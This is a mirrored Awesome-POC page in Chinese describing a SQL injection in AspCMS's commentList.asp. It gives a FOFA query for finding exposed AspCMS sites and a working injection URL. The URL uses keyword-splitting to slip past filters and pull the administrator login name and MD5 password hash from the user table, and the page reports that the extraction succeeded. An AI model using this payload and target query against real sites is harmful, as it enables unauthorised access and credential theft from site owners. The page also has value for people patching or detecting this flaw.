admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/CMS漏洞/AspCMS commentList.asp SQL注入漏洞.md

33 lines
667 B
Markdown
Raw Normal View History

update gitbook
2022-02-20 16:14:31 +08:00
# AspCMS commentList.asp SQL注入漏洞
## 漏洞描述
AspCMS commentList.asp 存在SQL注入漏洞攻击者通过漏洞可以获取管理员md5的密码
## 漏洞影响
```
AspCMS
```
## FOFA
```
app="ASPCMS"
```
## 漏洞复现
通过网站源码响应判断CMS
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170904613.png)
验证POC
```php
/plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user
```
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170904678.png)
成功获取管理员账号以及密码的MD5
Reference in New Issue Copy Permalink